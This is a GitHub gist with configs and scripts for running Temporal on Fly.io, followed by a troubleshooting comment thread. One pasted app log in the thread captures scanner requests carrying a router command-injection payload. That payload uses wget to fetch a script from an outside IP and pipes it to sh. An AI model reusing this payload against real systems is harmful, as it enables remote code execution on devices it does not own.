@khuezy
Last active February 22, 2025 16:52
Temporal Fly.io

Since a few people have asked how to set up Temporal on Fly.io, I thought this would be useful.

Disclaimer: I'm not a Fly or Temporal expert (in fact, I'm a big noob), so please forgive any mistakes. Suggestions for improving these configs, for others and for me, are welcome.

Don't forget to add a private IPv6 address: `fly ips allocate-v6 --private`

This is required for the UI app to connect to the server via `.flycast`.

Dockerfile

ARG GOPROXY
##### Temporal server with Auto-Setup #####
FROM temporalio/ui:2.27.2 as ui
FROM temporalio/server:1.24.1.0 as server
WORKDIR /etc/temporal
FROM temporalio/auto-setup:1.24.1.0 as final
COPY --from=ui --chown=temporal:temporal /home/ui-server /home/ui-server
RUN rm -rf /home/ui-server/config/*
EXPOSE 7233 8080
# Use MySQL, ES, or something else
ENV DB=postgres12
ENV DB_PORT=5432
# Move these to `fly secrets`
# Your DB host (e.g. db.xxx.supabase.co, or whatever your DB domain is)
ENV POSTGRES_SEEDS=db.xxx.supabase.co
ENV POSTGRES_USER=postgres
# Use a better password
ENV POSTGRES_PWD=P@ssw0rd
ENV DBNAME=postgres
# Point visibility at a different database. I'm using the same one for now because Supabase's free tier
# only allows for 1 free database. This requires manual migration.
ENV VISIBILITY_DBNAME=postgres
ENV BIND_ON_IP=0.0.0.0
ENV TEMPORAL_BROADCAST_ADDRESS=0.0.0.0
ENV DEFAULT_NAMESPACE=default
ENV DYNAMIC_CONFIG_FILE_PATH=/etc/temporal/config/dynamicconfig/docker.yaml
# These two .sh files are defined below
COPY ./start.sh /etc/temporal/start.sh
COPY ./start-ui.sh /etc/temporal/start-ui.sh
CMD ["autosetup"]
ENTRYPOINT ["/etc/temporal/start.sh"]

fly.toml

app = 'my-temporal-app'
primary_region = 'sea'
[processes]
server = '/etc/temporal/entrypoint.sh autosetup'
ui = '/etc/temporal/start-ui.sh'
[[services]]
protocol = 'tcp'
internal_port = 7233
auto_stop_machines = true
auto_start_machines = true
min_machines_running = 1
processes = ['server']
[[services.ports]]
port = 7233
# handlers = ['http'] # Do not expose publicly; any public IPv4/IPv6 should already be removed
# alpn h2 is needed for the gRPC protocol
[services.ports.tls_options]
alpn = ['h2']
[[services.tcp_checks]]
interval = '10s'
timeout = '2s'
grace_period = '5s'
[[services]]
protocol = 'tcp'
internal_port = 8080
auto_stop_machines = true
auto_start_machines = true
min_machines_running = 0
processes = ['ui']
# Ideally, don't expose the UI publicly: keep it behind a CDN (e.g. Cloudflare) and whitelist the IP,
# or make it public but set up SSO
[[services.ports]]
port = 8080
# handlers = ['http']
# [[services.ports]]
# port = 443
# handlers = ['tls', 'http']
[[vm]]
size = 'shared-cpu-1x'
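Fly's `[[services.tcp_checks]]` only verifies that something accepts a TCP connection on the service's `internal_port` (7233 here). When that check keeps failing, you can reproduce it roughly by hand from inside the machine, for example over `fly ssh console`. The helper below is a sketch. `tcp_check` is a made-up name, and it assumes `bash` (for its `/dev/tcp` redirection) and a `timeout` command are available in the image.

```shell
#!/usr/bin/env bash
# Hypothetical helper approximating the [[services.tcp_checks]] block above:
# succeed only if HOST:PORT accepts a TCP connection within TIMEOUT seconds
# (default 2s, matching timeout = '2s' in the gist's fly.toml).
# Assumes bash (for /dev/tcp) and a `timeout` binary are installed.

tcp_check() {
  host="$1"
  port="$2"
  timeout_s="${3:-2}"
  # The child bash opens fd 3 to host:port; it exits 0 only if the connect succeeds.
  timeout "$timeout_s" bash -c "exec 3<>/dev/tcp/${host}/${port}" 2>/dev/null
}

# Example, run inside the server machine:
# tcp_check 127.0.0.1 7233 && echo "7233 is accepting connections"
```

If it fails from inside the machine as well, the server process never started listening on 7233. In that case, the server's own logs are the next place to look.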

start-ui.sh

#!/bin/sh
# The Temporal UI server expects to be started from `/home/ui-server`
cd /home/ui-server || exit 1
# Assumes the server and UI run in the same Fly app (as different processes).
# Change this to another Fly app or IP if the server runs elsewhere.
export TEMPORAL_ADDRESS="${FLY_APP_NAME}.flycast:7233"
# exec so the UI server replaces this shell and receives stop signals directly
exec ./start-ui-server.sh
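The comment in start-ui.sh says to change `TEMPORAL_ADDRESS` when the server runs somewhere else. You can do that without editing the script: honor a `TEMPORAL_ADDRESS` that is already set (e.g. via `fly secrets set`), and fall back to the same-app `.flycast` address otherwise. This is a sketch, not the gist's version, and `resolve_temporal_address` and `start_ui` are hypothetical names.

```shell
#!/bin/sh
# Sketch of a start-ui.sh variant (not the gist's version).

resolve_temporal_address() {
  # Prefer an explicit TEMPORAL_ADDRESS (e.g. set with `fly secrets set`);
  # otherwise assume the server runs in this same Fly app. Fly sets FLY_APP_NAME.
  printf '%s\n' "${TEMPORAL_ADDRESS:-${FLY_APP_NAME}.flycast:7233}"
}

start_ui() {
  # The UI server expects to be started from /home/ui-server
  cd /home/ui-server || return 1
  TEMPORAL_ADDRESS="$(resolve_temporal_address)"
  export TEMPORAL_ADDRESS
  # Replace this shell with the UI server
  exec ./start-ui-server.sh
}

# The real script would end with:
# start_ui
```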

start.sh

#!/bin/sh
# This is called via the fly.toml:
# [processes]
# server = "/etc/temporal/entrypoint.sh autosetup"
# ui = "/etc/temporal/start-ui.sh"
#
# This script itself is called in the Dockerfile:
# ENTRYPOINT ["/etc/temporal/start.sh"]
exec "$@"
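Fly runs the Dockerfile's ENTRYPOINT in front of each `[processes]` command. The server log later in this thread shows `/etc/temporal/start.sh /etc/temporal/entrypoint.sh autosetup`. That makes start.sh a convenient place for a pre-flight check that fails with a readable message when a DB setting is missing. This is a minimal sketch. `check_required_env` is a hypothetical name, and the variable list is copied from the Dockerfile above.

```shell
#!/bin/sh
# Sketch of a stricter start.sh (hypothetical; the gist's version is just `exec "$@"`).

check_required_env() {
  missing=""
  # Names taken from the gist's Dockerfile; adjust for MySQL, ES, etc.
  for name in DB DB_PORT POSTGRES_SEEDS POSTGRES_USER POSTGRES_PWD; do
    # printenv prints nothing for unset (or unexported) variables
    if [ -z "$(printenv "$name")" ]; then
      missing="$missing $name"
    fi
  done
  if [ -n "$missing" ]; then
    echo "start.sh: missing required env vars:$missing" >&2
    return 1
  fi
  return 0
}

# The tail of the real script would then be:
# check_required_env || exit 1
# exec "$@"
```

Because start.sh wraps both the server and ui processes, the check also runs for the UI. That's harmless here, since the Dockerfile sets these variables image-wide.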
@khuezy
Author

khuezy commented Oct 7, 2024

I believe they still work (I'm using the same setup right now). What issues are you having?

@demisx

demisx commented Oct 7, 2024

It's mostly the health check. It keeps failing during deployment, but it's not clear to me what's preventing the service on :7233 from running. This is what I see in the log:

2024-10-07T22:05:43Z runner[d8d9222f193538] iad [info]Configuring firecracker
2024-10-07T22:05:43Z app[d8d9222f193538] iad [info]2024-10-07T22:05:43.590977902 [01J9MG890MJW4Z3H1VREM10YM9:main] Running Firecracker v1.7.0
2024-10-07T22:05:43Z app[d8d9222f193538] iad [info][    0.319302] PCI: Fatal: No config space access function found
2024-10-07T22:05:44Z health[d8d9222f193538] iad [warn]Health check on port 7233 is in a 'warning' state. Your app may not be responding properly. Services exposed on ports [7233] may have intermittent failures until the health check passes.
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] INFO Starting init (commit: 04656915)...
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] INFO Preparing to run: `/etc/temporal/start.sh /etc/temporal/entrypoint.sh autosetup` as temporal
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] INFO [fly api proxy] listening at /.fly/api
2024-10-07T22:05:44Z runner[d8d9222f193538] iad [info]Machine created and started in 12.644s
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config; env=docker,configDir=config
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config files=[config/docker.yaml]
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config; env=docker,configDir=config
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 Loading config files=[config/docker.yaml]
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]   ____    __
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]  / __/___/ /  ___
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info] / _// __/ _ \/ _ \
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]/___/\__/_//_/\___/ v4.9.0
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]High performance, minimalist Go web framework
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]https://echo.labstack.com
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]____________________________________O/_______
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]                                    O\
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]⇨ http server started on [::]:8080
2024-10-07T22:05:44Z app[d8d9222f193538] iad [info]2024/10/07 22:05:44 INFO SSH listening listen_address=[fdaa:9:ab23:a7b:1db:739a:cb8:2]:22 dns_server=[fdaa::3]:53
2024-10-07T22:05:47Z health[d8d9222f193538] iad [error]Health check on port 7233 has failed. Your app is not responding properly. Services exposed on ports [7233] will have intermittent failures until the health check passes.

Any suggestion will be highly appreciated.

@khuezy
Author

khuezy commented Oct 7, 2024

It might be due to resource constraints? What is your memory size? I'm using a 256MB base with swap_size_mb = 512 for my dev/staging instance. I think those are the minimum values.

@demisx

demisx commented Oct 7, 2024

I have this in the app's fly.toml file. Or do I need to configure it somewhere else?

[[vm]]
  size = 'shared-cpu-1x'
  memory = '1gb'

@khuezy
Author

khuezy commented Oct 7, 2024

That should be plenty. Do you not have any other errors in the log?

@khuezy
Author

khuezy commented Oct 7, 2024

The "Echo" ASCII banner is coming from the UI process, so I think it doesn't have a proper bridge to your server.
Run `fly ips list` and see if you have a private v6 address. If you don't, create one with `fly ips allocate-v6 --private`.
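You can script that check so it only allocates when needed. This is a sketch under a loud assumption: it assumes `fly ips list` prints a table in which a Flycast address appears as a row with `v6` in the first (VERSION) column and `private` in the third (TYPE) column. Verify that against your flyctl version before relying on it. `has_private_v6` and `ensure_private_v6` are hypothetical names.

```shell
#!/bin/sh
# Sketch: allocate a private (Flycast) IPv6 only if the app doesn't have one yet.
# ASSUMPTION: `fly ips list` output has VERSION in column 1 and TYPE in column 3,
# with private Flycast rows reading "v6 ... private".

has_private_v6() {
  # Reads `fly ips list` output on stdin; exits 0 if a v6/private row exists.
  awk '$1 == "v6" && $3 == "private" { found = 1 } END { exit !found }'
}

ensure_private_v6() {
  app="$1"
  if fly ips list -a "$app" | has_private_v6; then
    echo "private IPv6 already allocated for $app"
  else
    fly ips allocate-v6 --private -a "$app"
  fi
}

# Usage: ensure_private_v6 my-temporal-app
```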

@demisx

demisx commented Oct 7, 2024

That should be plenty. Do you not have any other errors in the log?

Hmm... That's all I see when I run fly logs -a <app-name>. Is there another log that I am missing maybe?

The "ECHO" ascii is coming from the ui process, so I think it doesn't have the proper bridge to your server.
Do: fly ips list and see if you have a private v6 address. If you don't create one fly ips allocate-v6 --private

There was no private v6 address, so I added it manually as you suggested. Is this something I'm missing in the fly.toml config? I'm wondering why it isn't created during the launch/deploy phase. Anyway, after adding the private IP, I saw some activity like this in the app log:

2024-10-07T23:22:13Z proxy[4d89602be479d8] iad [info]machine became reachable in 89.097093ms
2024-10-07T23:22:13Z app[4d89602be479d8] iad [info]{"time":"2024-10-07T23:22:13.019185599Z","id":"","remote_ip":"172.16.1.210","host":"google.com:443","method":"CONNECT","uri":"google.com:443","user_agent":"Go-http-client/1.1","status":400,"error":"code=400, message=missing csrf token in request header","latency":1333240,"latency_human":"1.33324ms","bytes_in":0,"bytes_out":51}
2024-10-07T23:24:00Z app[4d89602be479d8] iad [info]{"time":"2024-10-07T23:24:00.98877547Z","id":"","remote_ip":"172.16.1.210","host":"169.155.60.169:8080","method":"GET","uri":"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)","user_agent":"Go-http-client/1.1","status":200,"error":"","latency":327930,"latency_human":"327.93µs","bytes_in":0,"bytes_out":1247}
2024-10-07T23:24:01Z app[4d89602be479d8] iad [info]{"time":"2024-10-07T23:24:01.152913024Z","id":"","remote_ip":"172.16.1.210","host":"169.155.60.169:8080","method":"GET","uri":"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)","user_agent":"Go-http-client/1.1","status":200,"error":"","latency":67870,"latency_human":"67.87µs","bytes_in":0,"bytes_out":1247}
2024-10-07T23:27:21Z proxy[4d89602be479d8] iad [info]App [app-name] has excess capacity, autostopping machine 4d89602be479d8. 0 out of 1 machines left running (region=iad, process group=ui)

But I don't see healthchecks passing still. These are the machines created:

[Screenshot (2024-10-07, 4:38 PM): the app's machines and their health checks]

@khuezy
Author

khuezy commented Oct 7, 2024

That looks good now. Your server should be running 24/7 (to save money, you may want to process.exit(0) after your worker finishes and use the Machines API to wake it up).
The UI machines auto-stop, which is what the "has excess capacity, autostopping machine" message is saying.
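For the wake-up half of that suggestion, here is a minimal sketch using `curl` against the Machines API's start endpoint (`POST /v1/apps/{app}/machines/{id}/start`). It assumes a Fly API token in `FLY_API_TOKEN` and a machine ID taken from `fly machines list`. The helper names and the `MACHINES_API` override are hypothetical.

```shell
#!/bin/sh
# Sketch: wake a stopped machine via the Fly Machines API.
# Assumes FLY_API_TOKEN holds a Fly API token and the machine ID comes from
# `fly machines list`. Helper names and MACHINES_API are hypothetical.

MACHINES_API="${MACHINES_API:-https://api.machines.dev/v1}"

machine_start_url() {
  # $1 = app name, $2 = machine ID
  printf '%s/apps/%s/machines/%s/start\n' "$MACHINES_API" "$1" "$2"
}

start_machine() {
  # -f: fail on HTTP errors so callers can check $?
  curl -fsS -X POST \
    -H "Authorization: Bearer ${FLY_API_TOKEN:?FLY_API_TOKEN is not set}" \
    "$(machine_start_url "$1" "$2")"
}

# Usage: start_machine my-temporal-app <machine-id>
```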

The healthchecks are good now right? I see the green dot.

@demisx

demisx commented Oct 8, 2024

Thank you! The ui machines went to sleep, but there is only one server machine and it still shows 0/1 healthchecks passing for some reason (3rd column in the image above). Wondering if I should try to re-deploy this app again...

Is creating private IP a manual step that needs to be done after each new deployment? This is my first time working with Fly.io.

@khuezy
Author

khuezy commented Oct 8, 2024

When you launch a new app, you can pass --flycast to have the private IPv6 assigned automatically. Once an app is launched, you don't need to create IPs again on deploy or when scaling up.
Regarding the failed health check, you'll need to filter by the server process to see what the error is. I'm guessing it's DB related.
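In the logs posted above, lines tagged `health[...]`, `proxy[...]` and `runner[...]` come from Fly itself. The process output is tagged `app[<machine-id>]`. One way to isolate the server is to look up its machine ID in `fly machines list`, where the process group should read `server`, and keep only that machine's `app[...]` lines. This is a sketch, and `filter_machine_logs` is a made-up name.

```shell
#!/bin/sh
# Sketch: keep only the app output of one machine from `fly logs`,
# dropping Fly's own health/proxy/runner lines.

filter_machine_logs() {
  # $1 = machine ID; reads `fly logs` output on stdin.
  # -F: treat "app[<id>]" literally (no regex brackets).
  grep -F "app[$1]"
}

# Usage:
# fly logs -a my-temporal-app | filter_machine_logs <server-machine-id>
```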

@demisx

demisx commented Oct 8, 2024

I tried the --flycast option with fly launch, but nothing happened. I had to move it to fly deploy for the IP address to be assigned. I'm still getting the health check error. I'll work on figuring out how to filter by the server process like you mentioned, because there isn't much useful info in the log that points to the source of the error.

This is how I currently launch this app. Maybe you'll spot something missing. Thank you very much again. You've been a tremendous help.

  1. Create app in Fly.io

    fly launch --config apps/worker/fly.dev.toml --dockerfile Dockerfile.remote --build-only
    ---
    ? Would you like to copy its configuration to the new app? Yes
    ? Do you want to tweak these settings before proceeding? No
  2. Set secrets

    # In Fish
    bash -c 'fly secrets set --config apps/worker/fly.dev.toml \
      DATABASE_URL=postgres://postgres:[db-password]@[db-app-name].internal:5432 \
      POSTGRES_USER=postgres \
      POSTGRES_PASSWORD=[db-password]'
  3. Deploy app to Fly.io

    fly deploy --config apps/worker/fly.dev.toml --flycast

@khuezy
Author

khuezy commented Oct 8, 2024

For step 2, I don't think those are the correct env variables for Temporal. They should be:

# Your DB host (e.g. db.xxx.supabase.co, or whatever your DB domain is)
ENV POSTGRES_SEEDS=db.xxx.supabase.co
ENV POSTGRES_USER=postgres
# Use a better password
ENV POSTGRES_PWD=P@ssw0rd
ENV DBNAME=postgres
# Change this to a different database
ENV VISIBILITY_DBNAME=postgres

There is no DATABASE_URL variable, and that value should only contain [db-app-name].flycast:5432.

For step 3, you don't need to pass in --flycast. You only need to set that up when you launch your app for the first time.
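To keep these values out of the Dockerfile (which already says to move them to `fly secrets`), they can be set as secrets with the same `--config` path used in step 2. This is a sketch. `check_seed` and `set_temporal_secrets` are hypothetical helpers. The guard simply rejects a `postgres://...` URL or a `user@host` value, since Temporal takes the user and password as separate variables.

```shell
#!/bin/sh
# Sketch: push Temporal's DB settings into Fly secrets instead of the image.
# Variable names match the gist's Dockerfile; usage values are placeholders.

check_seed() {
  # POSTGRES_SEEDS should be just the DB address, not a connection URL.
  case "$1" in
    "") echo "POSTGRES_SEEDS is empty" >&2; return 1 ;;
    *://*|*@*) echo "POSTGRES_SEEDS looks like a connection URL; pass only the DB address" >&2; return 1 ;;
  esac
  return 0
}

set_temporal_secrets() {
  # $1 = fly.toml path, $2 = DB address, $3 = DB password
  check_seed "$2" || return 1
  fly secrets set --config "$1" \
    POSTGRES_SEEDS="$2" \
    POSTGRES_USER=postgres \
    POSTGRES_PWD="$3"
}

# Usage:
# set_temporal_secrets apps/worker/fly.dev.toml '[db-app-name].flycast' '[db-password]'
```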

@demisx

demisx commented Oct 8, 2024

For step 3, you don't need to pass in --flycast. You only need to set that up when you launch your app for the first time.

For me it works only when I add --flycast flag to fly deploy. Maybe because my fly launch uses the --build-only flag?

Regarding the failed health check, you'll need to filter by the server process to see what the error is. I'm guessing it's DB related.

Where would I find the log that would allow me to see the DB connection errors? When I do fly logs -a [app-name] I only see the error related to the failed health check, nothing more on what could actually cause this check to fail.

@khuezy
Author

khuezy commented Oct 8, 2024

You should be able to see the full logs. If you're not seeing anything useful, try adding TEMPORAL_DEBUG=true to your env variables.
I'm not sure what the actual flag is, so that might be wrong.
EDIT: LOG_LEVEL = 'debug'

@demisx

demisx commented Oct 9, 2024

Just in case this helps others: adding the TEMPORAL_DEBUG=true env var didn't make any difference, but LOG_LEVEL = 'debug' (in fly.toml) made debug-level messages show up. I also had to comment out ENV VISIBILITY_DBNAME=postgres so that the default temporal_visibility database gets created. Without that, some visibility tables were missing from the Postgres DB.
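To confirm that auto-setup actually created both databases, you can list them with `psql` and check for the expected names. This is a sketch. It assumes `psql` is installed and that `PGHOST`/`PGUSER`/`PGPASSWORD` point at the same server as `POSTGRES_SEEDS`/`POSTGRES_USER`/`POSTGRES_PWD`. `check_temporal_dbs` is a hypothetical name.

```shell
#!/bin/sh
# Sketch: verify that the databases Temporal needs exist.
# stdin = one database name per line; arguments = names that must be present.

check_temporal_dbs() {
  dbs=$(cat)
  status=0
  for name in "$@"; do
    # -x: whole-line match, -F: literal string
    if ! printf '%s\n' "$dbs" | grep -qxF "$name"; then
      echo "missing database: $name" >&2
      status=1
    fi
  done
  return "$status"
}

# Usage (-A unaligned, -t tuples only, -c run one command):
# psql -Atc 'SELECT datname FROM pg_database' | check_temporal_dbs postgres temporal_visibility
```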

I have successfully started the server app (@khuezy you rock!). I've verified that the schema got provisioned in the DB too. Now I'm just trying to figure out how to access the UI. I've assigned a public IP to the app, but nothing comes up. I'm sure I'm missing something. This is what I get:

# Verify public IP assigned
$ dig +short [app-name].fly.dev
137.x.x.x

# Try to access the app
$ curl -Iv https://[app-name].fly.dev
* Could not resolve host: [app-name].fly.dev
* Closing connection
curl: (6) Could not resolve host: [app-name].fly.dev

@khuezy
Author

khuezy commented Oct 9, 2024

Nice! Glad you got the server figured out. For the UI: the example above intentionally does not expose the UI app publicly, as that would be a bad idea. Instead, create an nginx app that proxies to the UI app over .flycast, routed by a server name such as temporalui.example.com.
Then put that address behind a CDN (Cloudflare) protected by an IP whitelist, or protect it with basic auth directly in your nginx config.
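For the basic-auth option, nginx reads credentials from a file named by `auth_basic_user_file`. Each entry in that file is a `user:hash` line. The helper below is a sketch that builds such a line. It assumes the `openssl` CLI is available, whose `passwd -apr1` produces an Apache MD5 hash that nginx accepts. `htpasswd_line` and the file path in the comments are hypothetical.

```shell
#!/bin/sh
# Sketch: build one htpasswd entry for nginx basic auth.
# Assumes the openssl CLI is installed. Note: passing the password as an
# argument makes it briefly visible in the process list.

htpasswd_line() {
  # $1 = user, $2 = password
  hash=$(openssl passwd -apr1 "$2") || return 1
  printf '%s:%s\n' "$1" "$hash"
}

# Usage: htpasswd_line admin 'a-long-random-password' > .htpasswd
# Then, in the nginx server block (hypothetical path):
#   auth_basic "Temporal UI";
#   auth_basic_user_file /etc/nginx/.htpasswd;
```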

@demisx

demisx commented Oct 9, 2024

Got it! Yes, I've gone through your fly.toml and noticed those commented-out lines. Once I enabled these, the UI started to show up:

[[services.ports]]
  port = 80
  handlers = ['http']

[[services.ports]]
  port = 443
  handlers = ['tls', 'http']

I am going to comment out these lines again per your advice. I agree this UI should be protected for authorized access only.

@demisx

demisx commented Oct 10, 2024

Also, a much easier way to access the UI is to forward the remote port to localhost.

  1. Forward port in a separate terminal
    fly proxy 8080 -a [temporal-server-app-name]
  2. Access UI at http://localhost:8080/

@khuezy
Author

khuezy commented Oct 10, 2024

👍 Yup that's the simplest way if you don't need remote access.
